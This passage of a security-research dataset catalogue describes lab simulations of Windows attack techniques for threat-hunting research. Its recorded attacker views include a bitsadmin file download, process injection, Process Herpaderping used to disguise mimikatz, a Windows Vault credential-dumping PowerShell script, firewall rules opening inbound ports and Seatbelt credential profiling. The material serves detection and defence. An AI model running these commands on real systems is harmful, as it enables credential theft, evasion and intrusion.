dataset represents threat actors leveraging bitsadmin.exe to download a file.", "attack_mappings": [{"technique": "T1197", "sub-technique": null, "tactics": ["TA0003", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_bitsadmin_download_psh_script.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md#atomic-test-1---bitsadmin-download-cmd"}], "permissions_required": ["Administrator"], "adversary_view": "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\\bitsadmin1_flag.ps1\n\nDISPLAY: '/Download' TYPE: DOWNLOAD STATE: TRANSFERRED\nPRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 6886 / 6886 (100%)\nTransfer complete."}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md#atomic-test-1---bitsadmin-download-cmd"]}, "SDWIN-201023031210": {"title": "PurpleSharp PE Injection CreateRemoteThread", "id": "SDWIN-201023031210", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/23", "modification_date": "2020/10/23", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors injecting portable executables (PE) into processes via APIs such asVirtualAllocEx and WriteProcessMemory and running it on the virtual address space of another process via the CreateRemoteThread API.", "attack_mappings": [{"technique": "T1055", "sub-technique": "002", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/purplesharp_pe_injection_createremotethread.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/mvelazc0/PurpleSharp/blob/master/PurpleSharp/Simulations/DefenseEvasion.cs#L216-L238"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Desktop>PurpleSharp.exe /t T1055.002\n10/23/2020 03:12:04 [*]  Starting T1055.002 Simulation on WORKSTATION5\n10/23/2020 03:12:04 [*]  Simulator running from C:\\Users\\wardog\\Desktop\\PurpleSharp.exe with PID:8972 as WORKSTATION5\\wardog\n10/23/2020 03:12:04 [*]  Process notepad.exe with PID:9908 started for the injection\n10/23/2020 03:12:04 [*]  Calling OpenProcess on PID:9908\n10/23/2020 03:12:04 [*]  Calling VirtualAllocEx on PID:9908\n10/23/2020 03:12:04 [*]  Calling WriteProcessMemory on PID:9908\n10/23/2020 03:12:04 [*]  Calling CreateRemoteThread on PID:9908\n10/23/2020 03:12:04 [*]  Simulation Finished\n10/23/2020 03:12:04 [*]  Playbook Finished\n\nC:\\Users\\wardog\\Desktop>"}, "references": ["https://github.com/mvelazc0/PurpleSharp/blob/master/PurpleSharp/Simulations/DefenseEvasion.cs#L216-L238"]}, "SDWIN-201026235835": {"title": "Process Herpaderping Mimikatz", "id": "SDWIN-201026235835", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/26", "modification_date": "2020/10/26", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents the execution of a Process Herpaderping to obscure the intentions of a process by modifying the content on disk after the image has been mapped.", "attack_mappings": [{"technique": "T1055", "sub-technique": null, "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_process_herpaderping_snippingtool.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/jxy-s/herpaderping"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog>cd Desktop\n\nC:\\Users\\wardog\\Desktop>ProcessHerpaderping.exe mimikatz.exe wardog.exe C:\\Windows\\system32\\SnippingTool.exe\nProcess Herpaderping Tool - Copyright (c) 2020 Johnny Shaw\n[12140:10252][OK]    Source File: \"mimikatz.exe\"\n[12140:10252][OK]    Target File: \"wardog.exe\"\n[12140:10252][INFO]  Copied source binary to target file\n[12140:10252][INFO]  Created image section for target\n[12140:10252][INFO]  Created process object, PID 8924\n[12140:10252][INFO]  Located target image entry RVA 0x000c3aec\n[12140:10252][OK]    Replacing target with \"C:\\Windows\\system32\\SnippingTool.exe\"\n[12140:10252][OK]    Preparing target for execution\n[12140:10252][INFO]  Writing process parameters, remote PEB ProcessParameters 0x0000000000AED020\n[12140:10252][INFO]  Creating thread in process at entry point 0x00007FF733E63AEC\n[12140:10252][INFO]  Created thread, TID 12112\n[12140:10252][OK]    Waiting for herpaderped process to exit\n[12140:10252][OK]    Herpaderped process exited with code 0xc000013a\n[12140:10252][OK]    Process Herpaderp Succeeded\n\nC:\\Users\\wardog\\Desktop>"}, "references": ["https://github.com/jxy-s/herpaderping", "https://twitter.com/jxy__s/status/1320853852153769984"]}, "SDWIN-201028191914": {"title": "Windows Vault Web Credentials", "id": "SDWIN-201028191914", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/28", "modification_date": "2020/10/28", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors accessing the Windows Vault and reading web credentials saved.", "attack_mappings": [{"technique": "T1055", "sub-technique": null, "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_windows_vault_web_credentials.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": "https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "Add Web Credentials\n-------------------\nPS > $pv = New-Object Windows.Security.Credentials.PasswordVault\nPS > $pw = New-Object Windows.Security.Credentials.PasswordCredential('http://ossemproject.com', 'pgustavo', 'Pass@Word')\nPS >$pv.Add($pw)\n\nImport Get-WebCredentials\n-------------------------\nfunction Get-WebCredentials\n{\n  <#\n  .SYNOPSIS\n  Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above)\n  .DESCRIPTION\n  This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script \n  also needs PowerShell v3 onwards and must be run from an elevated shell.\n  .EXAMPLE\n  PS > Get-WebCredentials\n  .LINK\n  https://github.com/samratashok/nishang\n  #>\n  [CmdletBinding()] Param ()\n  \n  \n  #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage\n  $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]\n  $VaultObj = new-object Windows.Security.Credentials.PasswordVault\n  $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }\n}\n\nRun Get-WebCredentials\n----------------------\nPS C:\\Users\\wardog> Get-WebCredentials\n\nUserName Resource                Password  Properties\n-------- --------                --------  ----------\npgustavo http://ossemproject.com Pass@Word {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], ...\n\n\nPS C:\\Users\\wardog>"}, "references": ["https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1"]}, "SDWIN-201029001615": {"title": "Python HTTP Server", "id": "SDWIN-201029001615", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/29", "modification_date": "2020/10/29", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors adding a FW inbound rule and starting a Python HTTP Server.", "attack_mappings": [{"technique": "T1059", "sub-technique": null, "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/psh_python_webserver.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "Add Firewall Rule\n-----------------\nPS > & netsh advfirewall firewall add rule name=\"python.exe\" dir=in action=allow description=\"python.exe\" program=\"C:\\users\\wardog\\appdata\\local\\programs\\python\\python39\\python.exe\" enable=yes localport=any protocol=tcp remoteip=any\nOk.    \n\nPS > & netsh advfirewall firewall add rule name=\"python.exe\" dir=in action=allow description=\"python.exe\" program=\"C:\\users\\wardog\\appdata\\local\\programs\\python\\python39\\python.exe\" enable=yes localport=any protocol=udp remoteip=any\nOk.\n\nStart HTTP Server\n-----------------\nPS > python -m http.server 8000\n\nServing HTTP on :: port 8000 (http://[::]:8000/) ..."}, "references": null}, "SDWIN-201029202324": {"title": "SharpView PCRE.NET", "id": "SDWIN-201029202324", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/29", "modification_date": "2020/10/29", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor leveraging SharpView and specific functions such as Get-ObjectAcl creating files and loading dlls related to PCRE.NET use.", "attack_mappings": [{"technique": "T1059", "sub-technique": null, "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/cmd_sharpview_pcre_net.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "C:\\ProgramData>SharpView.exe Get-ObjectAcl -SamAccountName \"Domain Admins\"\n[Get-DomainSearcher] search base: LDAP://MORDORDC.THESHIRE.LOCAL/DC=THESHIRE,DC=LOCAL\n[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))\nObjectDN                       : CN=Domain Admins,CN=Users,DC=theshire,DC=local\nObjectAceFlags                 : ObjectAceTypePresent, InheritedObjectAceTypePresent\nObjectAceType                  : 4c164200-20c0-11d0-a768-00aa006e0529\nInheritedObjectAceType         : 4828cc14-1437-45bc-9b07-ad6f015e5f28\nBinaryLength                   : 60\nAceQualifier                   : AccessAllowed\nIsCallback                     : False\nOpaqueLength                   : 0\nAccessMask                     : 16\nSecurityIdentifier             : S-1-5-32-554\nAceType                        : AccessAllowedObject\nAceFlags                       : None\nIsInherited                    : False\nInheritanceFlags               : None\nPropagationFlags               : None\nAuditFlags                     : None\nObjectSID                      : S-1-5-21-3140987116-517580383-2541594433-512\nActiveDirectoryRights          : ReadProperty\n..\n....."}, "references": ["https://github.com/tevora-threat/SharpView", "https://twitter.com/rbmaslen/status/1321859647091970051", "https://twitter.com/tifkin_/status/1321916444557365248"]}, "SDWIN-201102041306": {"title": "PowerShell HTTP Listener", "id": "SDWIN-201102041306", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/02", "modification_date": "2020/11/02", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using PowerShell to start an HTTP Listener on a compromised endpoint", "attack_mappings": [{"technique": "T1059", "sub-technique": "001", "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/psh_powershell_httplistener.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "$Hso = New-Object Net.HttpListener\n$Hso.Prefixes.Add(\"http://+:8000/\")\n$Hso.Start() "}, "references": ["https://docs.microsoft.com/en-us/dotnet/api/system.net.httplistener?view=netcore-3.1"]}, "SDWIN-201102163918": {"title": "Seatbelt Group User Discovery", "id": "SDWIN-201102163918", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/02", "modification_date": "2020/11/02", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using Seatbelt profiling an endpoint. This specifically uses the -group=user command.", "attack_mappings": [{"technique": "T1012", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/cmd_seatbelt_group_user.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/GhostPack/Seatbelt"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Desktop>Seatbelt.exe -group=user\n\n                        %&&@@@&&\n                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%\n                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%\n%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((\n#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((\n#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((\n#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((\n#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####\n###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####\n#####%######################  %%%..                       @////(((&%%%%%%%################\n                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*\n                        &%%&&&%%%%%        v1.1.0         ,(((&%%%%%%%%%%%%%%%%%,\n                        #%%%%##,\n\n\n====== ChromePresence ======\n\n  C:\\Users\\wardog\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\\n\n    'History'     (11/2/2020 4:25:44 PM)  :  Run the 'ChromeHistory' command\n    'Cookies'     (11/2/2020 4:25:45 PM)  :  Run SharpDPAPI/SharpChrome or the Mimikatz \"dpapi::chrome\" module\n    'Login Data'  (11/2/2020 4:25:44 PM)  :  Run SharpDPAPI/SharpChrome or the Mimikatz \"dpapi::chrome\" module\n    Chrome Version                       :  86.0.4240.183\n        Version is 80+, new DPAPI scheme must be used\n====== CloudCredentials ======\n\n====== CredEnum ======\n\n  Target              : XboxLive\n  UserName            :\n  Password            : 45 43 53 32 20 00 00 00 11 F5 17 F2 CA 4E 24 26 0A 61 2C 8B E6 3A 3C 99 9A 09 88 A1 BE 7B BA 72 07 8A 5D CD A1 B3 A4 18 60 38 AD 4B 6D 40 5C 05 68 C3 A6 C8 51 C0 98 7C CB 3C DA AA 65 88 E6 B8 C0 93 BA FE 21 E5 34 7B A0 A9 F2 4B EF 09 D1 1E AE 10 AD 98 E7 AE C6 9B 27 D2 CF 50 39 CC 97 78 E9 0D 82 E3 1B 11 4C 90\n  CredentialType      : Generic\n  PersistenceType     : Session\n  LastWriteTime       : 10/29/2020 5:51:36 PM\n\n  Target              : threathunterplaybook.com\n  UserName            : wardog\n  Password            :\n  CredentialType      : DomainPassword\n  PersistenceType     : Enterprise\n  LastWriteTime       : 10/28/2020 7:13:44 PM\n\n====== dir ======\n\n  LastAccess LastWrite  Size      Path\n\n  20-09-07   20-09-07   0B        C:\\Users\\Default\\Documents\\My Music\\\n  20-09-07   20-09-07   0B        C:\\Users\\Default\\Documents\\My Pictures\\\n  20-09-07   20-09-07   0B        C:\\Users\\Default\\Documents\\My Videos\\\n  20-10-26   20-11-02   1.7KB     C:\\Users\\Public\\Desktop\\Git Bash.lnk\n  20-11-02   20-11-02   2.2KB     C:\\Users\\Public\\Desktop\\Google Chrome.lnk\n  20-10-08   20-10-28   0B        C:\\Users\\Public\\Documents\\Explorer Suite Signatures\\\n  20-09-07   20-09-07   0B        C:\\Users\\Public\\Documents\\My Music\\\n  20-09-07   20-09-07   0B        C:\\Users\\Public\\Documents\\My Pictures\\\n  20-09-07   20-09-07   0B        C:\\Users\\Public\\Documents\\My Videos\\\n  20-10-25   20-11-02   0B        C:\\Users\\wardog\\Desktop\\capa-v1.4.1-windows\\\n  20-10-18   20-11-02   0B        C:\\Users\\wardog\\Desktop\\Dumpert-master\\\n  20-10-13   20-11-02   0B        C:\\Users\\wardog\\Desktop\\GruntDLL\\\n  20-10-25   20-11-02   0B        C:\\Users\\wardog\\Desktop\\mimikatz_trunk\\\n  20-10-29   20-11-02   0B        C:\\Users\\wardog\\Desktop\\SharpView-master\\\n  20-10-09   20-11-02   0B        C:\\Users\\wardog\\Desktop\\SimpleInjection\\\n  20-10-13   20-11-02   0B        C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\\n  20-10-23   20-10-23   1.9KB     C:\\Users\\wardog\\Desktop\\0001.dat\n  20-10-18   20-10-18   81.2KB    C:\\Users\\wardog\\Desktop\\Dumpert-master.zip\n  20-10-13   20-10-13   8.4MB     C:\\Users\\wardog\\Desktop\\GruntDLL.zip\n  20-10-13   20-10-13   42.1KB    C:\\Users\\wardog\\Desktop\\GruntHTTP.bin\n  20-10-21   20-11-02   392.9MB   C:\\Users\\wardog\\Desktop\\igfx_win10_100.8853.exe\n  20-10-08   20-11-02   1.4KB     C:\\Users\\wardog\\Desktop\\Microsoft Edge.lnk\n  20-10-25   20-11-02   1.2MB     C:\\Users\\wardog\\Desktop\\mimikatz.exe\n  20-10-27   20-10-29   33B       C:\\Users\\wardog\\Desktop\\my_first_rule\n  20-10-18   20-11-02   74KB      C:\\Users\\wardog\\Desktop\\Outflank-Dumpert.exe\n  20-10-28   20-10-29   1.8KB     C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.yara\n  20-10-27   20-11-02   1.9KB     C:\\Users\\wardog\\Desktop\\Process Hacker 2.lnk\n  20-10-26   20-11-02   2.1MB     C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe\n  20-10-27   20-10-27   1.6KB     C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe.colors\n  20-10-27   20-10-27   15.7MB    C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe.viv\n  20-10-23   20-11-02   266.5KB   C:\\Users\\wardog\\Desktop\\PurpleSharp.exe\n  20-10-21   20-11-02   505.5KB   C:\\Users\\wardog\\Desktop\\Seatbelt.exe\n  20-10-29   20-10-29   651.3KB   C:\\Users\\wardog\\Desktop\\SharpView-master.zip\n  20-10-13   20-10-13   1.4MB     C:\\Users\\wardog\\Desktop\\SimpleInjection 2.zip\n  20-10-16   20-10-23   53KB      C:\\Users\\wardog\\Desktop\\SimpleInjection.dll\n  20-10-08   20-10-08   22.8MB    C:\\Users\\wardog\\Desktop\\SimpleInjection.zip\n  20-10-17   20-10-17   15.2KB    C:\\Users\\wardog\\Desktop\\sysmon.xml\n  20-10-09   20-10-27   209.5KB   C:\\Users\\wardog\\Desktop\\test.dll\n  20-10-27   20-10-27   1.1KB     C:\\Users\\wardog\\Desktop\\test.dll.colors\n  20-10-10   20-10-10   208.2KB   C:\\Users\\wardog\\Desktop\\test.json\n  20-10-09   20-10-12   88.5KB    C:\\Users\\wardog\\Desktop\\test2.dll\n  20-10-27   20-11-02   2.1MB     C:\\Users\\wardog\\Desktop\\yara64.exe\n  20-10-27   20-11-02   2MB       C:\\Users\\wardog\\Desktop\\yarac64.exe\n  20-10-26   20-11-02   0B        C:\\Users\\wardog\\Documents\\herpaderping\\\n  20-10-18   20-10-28   0B        C:\\Users\\wardog\\Documents\\LocaleMetaData\\\n  20-10-08   20-10-08   0B        C:\\Users\\wardog\\Documents\\My Music\\\n  20-10-08   20-10-08   0B        C:\\Users\\wardog\\Documents\\My Pictures\\\n  20-10-08   20-10-08   0B        C:\\Users\\wardog\\Documents\\My Videos\\\n  20-10-18   20-10-28   0B        C:\\Users\\wardog\\Documents\\Raccine(1)\\\n  20-11-02   20-11-02   0B        C:\\Users\\wardog\\Documents\\Set-AuditRule-master\\\n  20-10-08   20-10-28   0B        C:\\Users\\wardog\\Documents\\TagsRevisited\\\n  20-10-08   20-10-30   0B        C:\\Users\\wardog\\Documents\\Visual Studio 2019\\\n  20-10-17   20-10-28   0B        C:\\Users\\wardog\\Documents\\WindowsPowerShell\\\n  20-10-08   20-10-08   8.4MB     C:\\Users\\wardog\\Documents\\GruntDLL.zip\n  20-10-21   20-11-02   8.1KB     C:\\Users\\wardog\\Documents\\Mordor-WinEvents.psm1\n  20-11-02   20-11-02   208.2KB   C:\\Users\\wardog\\Documents\\psh_powershell_httplistener_2020-11-0204130683.json\n  20-10-29   20-10-29   3.4MB     C:\\Users\\wardog\\Documents\\psh_python_webserver_2020-10-2900161507.json\n  20-10-28   20-10-28   208.9KB   C:\\Users\\wardog\\Documents\\psh_web_credentials_2020-10-2819191483.json\n  20-10-18   20-10-18   283.3KB   C:\\Users\\wardog\\Documents\\Raccine(1).zip\n  20-11-02   20-11-02   879.8KB   C:\\Users\\wardog\\Documents\\Set-AuditRule-master.zip\n  20-10-20   20-10-21   10.3KB    C:\\Users\\wardog\\Documents\\Set-AuditRule.ps1\n  20-10-16   20-10-16   2.3KB     C:\\Users\\wardog\\Documents\\Start-EtwTrace.ps1\n  20-10-16   20-10-16   47.4KB    C:\\Users\\wardog\\Documents\\TLGMetadataParser.ps1\n  20-10-16   20-10-16   47.4KB    C:\\Users\\wardog\\Documents\\TLGMetadataParser.psm1\n  20-10-27   20-10-27   6.6KB     C:\\Users\\wardog\\Documents\\udl-yara.xml\n  20-10-27   20-10-27   6KB       C:\\Users\\wardog\\Documents\\YARA.xml\n  20-10-10   20-10-28   0B        C:\\Users\\wardog\\Downloads\\evtx_dump-0.6.8-x86_64-pc-windows-msvc.tar\\\n  20-10-10   20-10-28   0B        C:\\Users\\wardog\\Downloads\\fd-v8.1.1-x86_64-pc-windows-msvc\\\n  20-10-08   20-11-02   0B        C:\\Users\\wardog\\Downloads\\Koppeling-master\\\n  20-10-27   20-10-28   0B        C:\\Users\\wardog\\Downloads\\OpenJDK11U-jdk_x64_windows_hotspot_11.0.9_11\\\n  20-10-19   20-10-28   0B        C:\\Users\\wardog\\Downloads\\PSTools\\\n  20-10-09   20-10-28   0B        C:\\Users\\wardog\\Downloads\\Sysmon\\\n  20-10-27   20-10-28   0B        C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64\\\n  20-10-25   20-10-25   11.1MB    C:\\Users\\wardog\\Downloads\\capa-v1.4.1-windows.zip\n  20-10-10   20-10-10   1.2MB     C:\\Users\\wardog\\Downloads\\evtx_dump-0.6.8-x86_64-pc-windows-msvc.tar.gz\n  20-10-10   20-10-10   898.4KB   C:\\Users\\wardog\\Downloads\\fd-v8.1.1-x86_64-pc-windows-msvc.zip\n  20-10-27   20-10-27   67.5MB    C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build.zip\n  20-10-08   20-10-08   36.3KB    C:\\Users\\wardog\\Downloads\\Koppeling-master.zip\n  20-10-25   20-10-25   1.1MB     C:\\Users\\wardog\\Downloads\\mimikatz_trunk.zip\n  20-10-27   20-10-27   186.7MB   C:\\Users\\wardog\\Downloads\\OpenJDK11U-jdk_x64_windows_hotspot_11.0.9_11.zip\n  20-10-19   20-10-19   3MB       C:\\Users\\wardog\\Downloads\\PSTools.zip\n  20-10-09   20-10-09   1.8MB     C:\\Users\\wardog\\Downloads\\Sysmon.zip\n  20-10-27   20-10-27   2MB       C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64.zip\n====== DpapiMasterKeys ======\n\n  Folder : C:\\Users\\wardog\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3940915590-64593676-1414006259-500\n\n    LastAccessed              LastModified              FileName\n    ------------              ------------              --------\n    10/18/2020 3:41:37 AM     10/18/2020 3:41:37 AM     ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n\n\n  [*] Use the Mimikatz \"dpapi::masterkey\" module with appropriate arguments (/pvk or /rpc) to decrypt\n  [*] You can also extract many DPAPI masterkeys from memory with the Mimikatz \"sekurlsa::dpapi\" module\n  [*] You can also use SharpDPAPI for masterkey retrieval.\n====== ExplorerMRUs ======\n\n  Explorer  BUILTIN\\Administrators  2020-11-02  C:\\Users\\wardog\\Documents\\cmd_psexec_lsa_secrets_dump_2020-10-2001090629.json\n  Explorer  BUILTIN\\Administrators  2020-11-02  C:\\Users\\wardog\\Documents\\AMSITLGTrace.evtx\n  Explorer  BUILTIN\\Administrators  2020-11-02  C:\\Windows\\System32\\amsi.dll\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\Mordor-WinEvents.psm1\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\MordorDataset.json\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\mordor_raccine_simulation_mode_2020-10-18T05154752.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\Koppeling-master\\Koppeling-master\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\Koppeling-master\\Koppeling-master\\Koppeling.sln\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Windows\\System32\\winevt\\Logs\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-Sysmon%4Operational.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\GruntDLL\\GruntDLL\\GruntDLL.sln\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\Export-WinEvents.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\export.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build\\ghidra-Ghidra_9.1.2_build\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\GruntDLL\\GruntDLL\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\GruntDLL.zip\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\export.json\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\Export-EventLogs.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\\Dumpert-master\\Dumpert-master\\Dumpert\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Desktop\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build\\ghidra-Ghidra_9.1.2_build\\DevGuide.md\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\cmd_sam_copy_esentutl_2020-10-1900171197.json\n  Explorer  BUILTIN\\Administrators  2020-10-30  C:\\Users\\wardog\\Documents\\cmd_sam_copy_esentutl_2020-10-1823514110.json\n  Explorer  BUILTIN\\Administrators  2020-10-29  C:\\Users\\wardog\\Desktop\\SharpView-master\\SharpView-master\n  Explorer  BUILTIN\\Administrators  2020-10-29  C:\\Users\\wardog\\Desktop\\SharpView-master\\SharpView-master\\SharpView.sln\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\YARA.xml\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64.zip\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript4.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript5.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript3.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\wmic_remote_xsl_jscript2.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\wmic_remote_xsl_jscript.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\udl-yara.xml\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\TLGMetadataParser.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\TLGMetadataParser.psm1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\test.txt\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\test.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\test.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\test.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Windows\\System32\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\sysmon.xml\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\Start-EtwTrace.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\SimpleInjection\\SimpleInjection.sln\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection\\SimpleInjection.zip\n  Explorer  